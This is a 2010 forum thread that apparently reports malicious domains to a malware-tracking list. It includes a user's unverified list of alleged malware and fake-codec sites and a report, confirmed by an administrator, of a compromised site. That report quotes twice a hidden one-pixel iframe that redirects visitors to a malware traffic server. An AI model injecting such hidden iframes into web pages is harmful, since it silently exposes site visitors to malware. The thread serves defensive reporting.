Author Topic: Domains Not In Malware Domain List  (Read 4361 times)

0 Members and 1 Guest are viewing this topic.

August 06, 2010, 03:05:26 am
Read 4361 times

izzy.rose

  • Newbie

  • Offline
  • *

  • 1
hxxp://www.hdtvxvid.net/ - Fake Codec
hxxp://www.madsexxx.com/ - Malware/Porn Site
hxxp://www.playcontact.com/ - Fake Codec
hxxp://www.ezthemes.com/ - Malware Distributor
hxxp://www.information.com/ - Fake Search Engine (Opens Up Fake Links To Malware Sites)
hxxp://www.aaathemes.com/ - Malware Distributor
hxxp://www.imgfarm.com/ - Adware/Spyware Distributor
...And that's about it.  ::)
-Izzy
------------------
→Izzy Loves GN'R←

August 17, 2010, 01:58:39 pm
Reply #1

Mofaya

  • Newbie

  • Offline
  • *

  • 8

Can some one please check this one out to please ?? its been up for a few months now that i know of because its the second time i bumped into it .  >:(

the domain is jamaican-slang.com 

Thank you very much all admins i love the site very much  ;) .

August 17, 2010, 02:18:12 pm
Reply #2

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
If you can provide complete urls which point to malicious content, then we will check them.

We never add simply domain names  and claim that there is "something". It has to be clear and provable what's wrong with a site.
Investigating sites is very time consuming. It saves us a lot of time if you provide as much details as you can , for example
VirusTotal, Wepawet or JsUnpack reports.
Ruining the bad guy's day

August 17, 2010, 03:03:31 pm
Reply #3

Mofaya

  • Newbie

  • Offline
  • *

  • 8
Yes sorry about that .

Ok im a total noob at this but from the looks of it the site has been comprimised.
Here is the wepawet analyses report
http://wepawet.iseclab.org/view.php?hash=1799f721a44f89ce84d6e5485287a27f&t=1282053697&type=js

The first thing that caught my eye was
<iframe src='hxxp://itsallbreaksoft.net/tds/in.cgi?3&seoref=http%3A%2F%2Fwww.jamaican-slang.com%2F&parameter=$ke
yword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fwww.jamaican-slang.com%2F&default_keyword=notdefine'
width=1 height=1 border=0 frameborder=0></iframe>

After googling itsallbreaksoft.net i bumped into this
http://www.theinternetpatrol.com/was-your-site-hacked-redirecting-to-itsallbreaksoftnet-or-paymoneysysteminfo-heres-what-happened/

itsallbreaksoft.net is currently down.
I think this is the reason why my anti virus blocked the site for being infected with iframe trojan.

PS Sorry for my bad english .

August 17, 2010, 07:25:18 pm
Reply #4

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Yes sorry about that .

Ok im a total noob at this but from the looks of it the site has been comprimised.
Here is the wepawet analyses report
http://wepawet.iseclab.org/view.php?hash=1799f721a44f89ce84d6e5485287a27f&t=1282053697&type=js

The first thing that caught my eye was
<iframe src='hxxp://itsallbreaksoft.net/tds/in.cgi?3&seoref=http%3A%2F%2Fwww.jamaican-slang.com%2F&parameter=$ke
yword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fwww.jamaican-slang.com%2F&default_keyword=notdefine'
width=1 height=1 border=0 frameborder=0></iframe>

After googling itsallbreaksoft.net i bumped into this
http://www.theinternetpatrol.com/was-your-site-hacked-redirecting-to-itsallbreaksoftnet-or-paymoneysysteminfo-heres-what-happened/

itsallbreaksoft.net is currently down.
I think this is the reason why my anti virus blocked the site for being infected with iframe trojan.

PS Sorry for my bad english .

Thanks. Any additional information about an url helps alot.

hxxp://www.jamaican-slang.com/ contains an obfuscated script which directs to hxxp://itsallbreaksoft.net/tds/in.cgi?3.
itsallbreaksoft.net is offline.


Ruining the bad guy's day